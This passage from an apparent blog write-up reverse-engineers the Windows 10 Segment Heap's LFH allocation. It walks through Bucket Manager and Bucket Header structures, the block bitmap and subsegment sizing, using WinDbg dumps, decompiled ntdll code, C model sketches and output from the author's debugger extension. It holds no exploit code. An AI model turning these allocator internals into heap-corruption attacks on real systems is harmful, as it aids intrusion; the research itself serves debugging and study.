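alloc_path choose_alloc_path(uint64_t size, uint64_t bucket_entry,
                             bool enough_allocs)
{
    if (size <= LFH_MAX_SIZE) {                 /* (0) */
        if ((bucket_entry & 1) == 0)
            return PATH_LFH;                    /* (1) */
        if (enough_allocs)
            return PATH_LFH_ACTIVATE;           /* (2) */
        /* (3): fall through to the VS / Large decision */
    }
    return size > VS_MAX_SIZE ? PATH_LARGE      /* (4) */
                              : PATH_VS;        /* (5) */
}
```

With the Bucket Table dump shown earlier, the entry 0x116abf90900 selects the LFH path, while an entry such as 0x026e0001 still goes to the VS heap until the activation threshold is reached.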
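Blocks are allocated in RtlpHpLfhSlotAllocate(). The logic of this function is fairly complex, so I will start from the Bucket Manager and walk through the LFH Block allocation process together with the key pieces of code. Because the debugging session is long, I do not paste the step-by-step debugging log here. Interested readers can single-step through RtlpHpLfhSlotAllocate to verify the description.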
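The Bucket Manager is a structure named _HEAP_LFH_BUCKET. One of its members is the important structure _HEAP_LFH_AFFINITY_SLOT, which in turn contains the important member structure _HEAP_LFH_SUBSEGMENT_OWNER. The relationship between the structures is shown below (important fields are marked with *).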
1: kd> dt _HEAP_LFH_BUCKET 116`abf90b00
ntdll!_HEAP_LFH_BUCKET
   +0x000 State : _HEAP_LFH_SUBSEGMENT_OWNER
   +0x038 TotalBlockCount : 0x5b7
   +0x040 TotalSubsegmentCount : 0x10
   +0x048 ReciprocalBlockSize : 0x3333334
   +0x04c Shift : 0x20 ' '
   +0x04d ContentionCount : 0 ''
   +0x050 AffinityMappingLock : 0
   +0x058 ProcAffinityMapping : 0x00000116`abf90b80 ""
 * +0x060 AffinitySlots : 0x00000116`abf90b88 -> 0x00000116`abf90bc0 _HEAP_LFH_AFFINITY_SLOT
1: kd> dt _HEAP_LFH_AFFINITY_SLOT 116`abf90bc0
ntdll!_HEAP_LFH_AFFINITY_SLOT
 * +0x000 State : _HEAP_LFH_SUBSEGMENT_OWNER
   +0x038 ActiveSubsegment : _HEAP_LFH_FAST_REF
1: kd> dt _HEAP_LFH_SUBSEGMENT_OWNER 116`abf90bc0
ntdll!_HEAP_LFH_SUBSEGMENT_OWNER
   +0x000 IsBucket : 0y0
   +0x000 Spare0 : 0y0000000 (0)
 * +0x001 BucketIndex : 0x5 ''
   +0x002 SlotCount : 0 ''
   +0x002 SlotIndex : 0 ''
   +0x003 Spare1 : 0 ''
 * +0x008 AvailableSubsegmentCount : 1
   +0x010 Lock : 0
 * +0x018 AvailableSubsegmentList : _LIST_ENTRY [ 0x00000116`ac5d4000 - 0x00000116`ac5d4000 ]
 * +0x028 FullSubsegmentList : _LIST_ENTRY [ 0x00000116`ac0f7000 - 0x00000116`ac5d0000 ]
LFH Buckets are managed with doubly linked lists. AvailableSubsegmentList is the list of Buckets that still contain free Blocks, and FullSubsegmentList is the list of Buckets that are completely full. Both lists hold the Bucket Headers of the individual Buckets. When the LFH allocates a Block, it checks AvailableSubsegmentCount in the Bucket Manager. If that value is less than or equal to 0, it goes on to check AvailableSubsegmentList. When AvailableSubsegmentList holds no usable Bucket Header, the list head points to itself.
1: kd> dq 116`abf90bc0 //_HEAP_LFH_SUBSEGMENT_OWNER structure
00000116`abf90bc0 00000000`00000500 00000000`00000001 //a Bucket is available
00000116`abf90bd0 00000000`00000000 00000116`ac5d4000 //AvailableSubsegmentList
00000116`abf90be0 00000116`ac5d4000 00000116`ac0f7000 //FullSubsegmentList
00000116`abf90bf0 00000116`ac5d0000 00000000`00000000
3: kd> dq 116`abf908c0 //_HEAP_LFH_SUBSEGMENT_OWNER structure
00000116`abf908c0 00000000`00000c00 00000000`00000000 //available Count is 0
00000116`abf908d0 00000000`00000000 00000116`abf908d8 //AvailableSubsegmentList points to itself
00000116`abf908e0 00000116`abf908d8 00000116`abf908e8 //FullSubsegmentList points to itself
00000116`abf908f0 00000116`abf908e8 00000000`00000000
v10 = &a3->State.AvailableSubsegmentCount;
if ( a3->State.AvailableSubsegmentCount <= 0 ) //Count is less than or equal to 0
{
  ……
  v121 = (__int64 **)&a2->State.AvailableSubsegmentList;
  if ( *v121 == (__int64 *)v121 //list pointer points to itself
    || ((RtlAcquireSRWLockExclusive(&a2->State.Lock), *v121 == (__int64 *)v121) ? (_RSI = 0i64) : (_RSI = RtlpHpLfhOwnerMoveSubsegment((__int64)a2, *v121, 2)),
        RtlReleaseSRWLockExclusive(&a2->State.Lock),
        !_RSI) )
  {
    _RSI = (__int64 *)RtlpHpLfhSubsegmentCreate(a1, a2, a5);
    if ( !_RSI )
      goto LABEL_52;
  }
  ……
}
If the conditions above hold, no Bucket is currently available and the LFH calls RtlpHpLfhSubsegmentCreate to create a new one. Inside RtlpHpLfhSubsegmentCreate we can see that the BucketIndex member of _HEAP_LFH_SUBSEGMENT_OWNER is used as an index into RtlpBucketBlockSizes, a global variable in ntdll, to get the Block Size of the Buckets managed by this Bucket Manager, which is the size of the heap allocation we requested.
v3 = a2->State.BucketIndex;
v4 = RtlpHpLfhPerfFlags;
v10 = a3;
v8 = (unsigned __int16)RtlpBucketBlockSizes[v3];
v33 = (unsigned __int16)RtlpBucketBlockSizes[v3];
1: kd> dq ntdll!RtlpBucketBlockSizes
00007ffc`5cbe1270 00300020`00100000 00700060`00500040 //Block Size
00007ffc`5cbe1280 00b000a0`00900080 00f000e0`00d000c0
00007ffc`5cbe1290 01300120`01100100 01700160`01500140
00007ffc`5cbe12a0 01b001a0`01900180 01f001e0`01d001c0
00007ffc`5cbe12b0 02300220`02100200 02700260`02500240
00007ffc`5cbe12c0 02b002a0`02900280 02f002e0`02d002c0
RtlpHpLfhSubsegmentCreate eventually allocates a Bucket and links its Bucket Header into AvailableSubsegmentList. The function also looks up the Size for the BucketIndex in RtlpBucketBlockSizes and carves the Bucket into Blocks of that size.
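To make the lookup concrete, here is a small C sketch that decodes the qwords from the dq output above into 16-bit sizes. The array only contains the 48 entries visible in that dump, so it is a partial copy of RtlpBucketBlockSizes, and the names `bucket_sizes_dump` and `block_size_for_bucket` are hypothetical. Because the target is little-endian, the lowest 16 bits of each dumped qword hold the lowest index.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The twelve qwords of ntdll!RtlpBucketBlockSizes shown in the dump above. */
static const uint64_t bucket_sizes_dump[] = {
    0x0030002000100000ULL, 0x0070006000500040ULL,
    0x00b000a000900080ULL, 0x00f000e000d000c0ULL,
    0x0130012001100100ULL, 0x0170016001500140ULL,
    0x01b001a001900180ULL, 0x01f001e001d001c0ULL,
    0x0230022002100200ULL, 0x0270026002500240ULL,
    0x02b002a002900280ULL, 0x02f002e002d002c0ULL,
};

/* Four 16-bit entries per qword. */
#define DUMPED_ENTRIES \
    ((sizeof bucket_sizes_dump / sizeof bucket_sizes_dump[0]) * 4)

/* Block size for a BucketIndex, limited to the dumped part of the table. */
uint16_t block_size_for_bucket(unsigned bucket_index)
{
    assert(bucket_index < DUMPED_ENTRIES);
    uint64_t q = bucket_sizes_dump[bucket_index / 4];
    return (uint16_t)(q >> (16 * (bucket_index % 4)));
}
```

For the Bucket Manager dumped earlier, BucketIndex 0x5 decodes to a Block Size of 0x50.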
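Once a usable Bucket exists, we reach the last step of allocation, which is easy to understand. When the Bucket was created, all of its Blocks were already carved out. The LFH picks a Block at random and returns its address, and that address is the address of our heap allocation. This step relies entirely on the Bucket Header.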
In the Segment Heap LFH, Blocks no longer have their own headers. Instead, the Bucket Header manages all the Blocks in a Bucket. The Bucket Header structure is called _HEAP_LFH_SUBSEGMENT.
1: kd> dt _HEAP_LFH_SUBSEGMENT 116`ac0f7000 FreeCount, BlockCount, BlockBitmap
ntdll!_HEAP_LFH_SUBSEGMENT
   +0x020 FreeCount : 0
   +0x022 BlockCount : 0x32
   +0x030 BlockBitmap : [1] 0x55555555`55555555
1: kd> dq 116`ac0f7000
00000116`ac0f7000 00000116`ac1f9000 00000116`abf90be8 //List_Entry
00000116`ac0f7010 00000116`abf90bc0 00000000`00000000
00000116`ac0f7020 0001002c`00320000 0040010c`60b53c07
00000116`ac0f7030 55555555`55555555 fffffff5`55555555
00000116`ac0f7040 00000000`00000001 00000000`00000000
In the Bucket Header, the Bitmap stores the state of every Block in the Bucket. These states are covered in Yason's slides, so I will not repeat them here. One thing worth mentioning: when the size you request is exactly equal to a size stored in RtlpBucketBlockSizes, 01 in the Bitmap means allocated and 00 means free. When the size you request differs from the size stored in RtlpBucketBlockSizes, the Bucket is still carved according to the stored size, but 11 means allocated and 10 means free. For example, if I request 0xc10 bytes, the actual Block is carved at 0xC80 and the high bit in the bitmap is set to 1. All of this depends on the Size stored at the Bucket's index in the RtlpBucketBlockSizes array.
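On allocation, a random free Block is found in the bitmap and returned. The matching position in the bitmap is set to the allocated state (low bit set to 1) and FreeCount is decremented by 1. When FreeCount reaches 0, the Bucket is completely full, so the LFH unlinks it from AvailableSubsegmentList and inserts it into FullSubsegmentList.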
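Free works the same way in reverse: the matching position in the bitmap is set to the free state and FreeCount is incremented by 1. If the Bucket is currently in FullSubsegmentList, it is unlinked from that list and added to AvailableSubsegmentList.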
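The bitmap bookkeeping described above can be modeled with a short C sketch. It is a simplified model under stated assumptions: `subsegment_model` and the three functions are hypothetical names, the structure keeps only FreeCount, BlockCount and a two-qword bitmap, and the caller chooses the Block index, whereas the real allocator picks a free Block at random. Each Block uses two bits, and the low bit of the pair is the busy flag.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical, reduced model of a Bucket Header for this sketch. */
typedef struct {
    uint16_t free_count;
    uint16_t block_count;
    uint64_t bitmap[2];      /* two bits per Block, up to 64 Blocks here */
} subsegment_model;

/* The low bit of each two-bit pair marks the Block as busy. */
bool block_is_busy(const subsegment_model *s, unsigned i)
{
    assert(i < s->block_count);
    return ((s->bitmap[i / 32] >> (2 * (i % 32))) & 1u) != 0;
}

/* Returns true when the subsegment just became full, which is when
 * it would move from AvailableSubsegmentList to FullSubsegmentList. */
bool mark_block_busy(subsegment_model *s, unsigned i)
{
    assert(!block_is_busy(s, i) && s->free_count > 0);
    s->bitmap[i / 32] |= 1ULL << (2 * (i % 32));
    s->free_count--;
    return s->free_count == 0;
}

/* Returns true when the subsegment was full before the free, which is
 * when it would move back to AvailableSubsegmentList. */
bool mark_block_free(subsegment_model *s, unsigned i)
{
    assert(block_is_busy(s, i));
    bool was_full = (s->free_count == 0);
    s->bitmap[i / 32] &= ~(1ULL << (2 * (i % 32)));
    s->free_count++;
    return was_full;
}
```

Loading the model with the values from the dump above (FreeCount 0, BlockCount 0x32, bitmap 0x5555555555555555 and 0xfffffff555555555) reports all 50 Blocks as busy.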
Finally, the number of Blocks allocated when a Bucket is created is not fixed. It is determined by TotalSubsegmentCount in _HEAP_LFH_BUCKET and by the requested size. The logic is implemented in RtlpGetSubSegmentBlockCount.
__int64 __fastcall RtlpGetSubSegmentBlockCount(unsigned int HeapSize, unsigned int TotalSubSegmentCount, char AlwaysZero, int IsFirstBucket)
{
  v5 = AlwaysZero - 1;
  if ( HeapSize >= 0x100 )
    v5 = AlwaysZero;
  v6 = v5 - 1;
  if ( !IsFirstBucket ) //if this is the first Bucket of this Size
    v6 = v5;
  if ( TotalSubSegmentCount < 1 << (3 - v6) )
    TotalSubSegmentCount = 1 << (3 - v6);
  if ( TotalSubSegmentCount < 4 )
    TotalSubSegmentCount = 4;
  if ( TotalSubSegmentCount > 0x400 )
    TotalSubSegmentCount = 0x400;
  return TotalSubSegmentCount;
}
As the number of allocations of a given Size grows, the number of Blocks created in each new Bucket grows as well.
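In my WinDbg extension, since Bucket Headers are always page-aligned, ANDing the queried heap address with 0xff..f000 gives the start of its page. Assuming that page start is a Bucket Header, the _HEAP_LFH_SUBSEGMENT_OWNER member of its _HEAP_LFH_SUBSEGMENT points to the Bucket Manager, and from there the header of the whole Segment Heap can be found. The Signature then tells us whether the Bucket Header is valid. If it is not, the extension subtracts 0x1000 from the current page start and keeps searching page by page, because a Bucket's Blocks may span more than one page.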
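The page-by-page search can be sketched as follows. This is not the extension's code: `find_subsegment_header`, `block_index`, the `header_check_fn` callback and the `max_pages` limit are all hypothetical, and `matches_known_header` is only a stand-in for the real validation, which follows the owner pointer to the Segment Heap and checks for the 0xDDEEDDEE Signature. The first-Block offset is passed in as a parameter because decoding it from the header is outside the scope of this sketch.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE 0x1000ULL

/* Hypothetical callback: true when `candidate` is a valid Bucket Header. */
typedef bool (*header_check_fn)(uint64_t candidate, void *ctx);

/* Stand-in checker for experiments: ctx points at one known-good header. */
bool matches_known_header(uint64_t candidate, void *ctx)
{
    return candidate == *(const uint64_t *)ctx;
}

/* Walk backwards one page at a time, starting at the page that contains
 * block_addr, until a valid header is found or max_pages extra pages
 * have been tried. Returns 0 when nothing was found. */
uint64_t find_subsegment_header(uint64_t block_addr, unsigned max_pages,
                                header_check_fn is_valid, void *ctx)
{
    assert(is_valid != NULL);
    uint64_t page = block_addr & ~(PAGE_SIZE - 1);
    for (unsigned i = 0; i <= max_pages; i++) {
        if (is_valid(page, ctx))
            return page;
        if (page < PAGE_SIZE)
            break;                       /* do not wrap below address 0 */
        page -= PAGE_SIZE;
    }
    return 0;
}

/* Index of the Block that contains addr inside a Bucket. */
uint64_t block_index(uint64_t header, uint64_t first_block_offset,
                     uint64_t block_size, uint64_t addr)
{
    assert(block_size != 0 && addr >= header + first_block_offset);
    return (addr - header - first_block_offset) / block_size;
}
```

Using the values from this post's example (header 0x116ac0f7000, first Block at offset 0x50, Block Size 0x50), the address 0x116ac0f7060 falls inside the Block with index 0.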
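After that, the Bucket Index reachable from the Bucket Header is used to look up the Bucket's Size in the global RtlpBucketBlockSizes array, and the bitmap is used to print the final layout of the Bucket.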
1: kd> !heapinfo 116`ac0f7060
Try to find Bucket Manager.
Bucket Header: 0x00000116ac0f7000
Bucket Flink: 0x00000116ac1f9000
Bucket Blink: 0x00000116abf90be8
Bucket Manager: 0x00000116abf90bc0
---------------------Bucket Info---------------------
Free Heap Count: 0
Total Heap Count: 50
Block Size: 0x50
--Index-- | -----Heap Address----- | --Size-- | --State--
0000      | *0x00000116ac0f7050    | 0x0050   | Busy
--------- | ---------------------- | -------- | ---------
0001      | 0x00000116ac0f70a0     | 0x0050   | Busy
--------- | ---------------------- | -------- | ---------
0002      | 0x00000116ac0f70f0     | 0x0050   | Busy
--------- | ---------------------- | -------- | ---------
0003      | 0x00000116ac0f7140     | 0x0050   | Busy
--------- | ---------------------- | -------- | ---------
0004      | 0x00000116ac0f7190     | 0x0050   | Busy
--------- | ---------------------- | -------- | ---------
0005      | 0x00000116ac0f71e0     | 0x0050   | Busy
--------- | ---------------------- | -------- | ---------
0006      | 0x00000116ac0f7230     | 0x0050   | Busy
--------- | ---------------------- | -------- | ---------
0007      | 0x00000116ac0f7280     | 0x0050   | Busy
--------- | ---------------------- | -------- | ---------
Reference: Mark Yason, "Windows 10 Segment Heap Internals"
My Project: SegmentHeapExt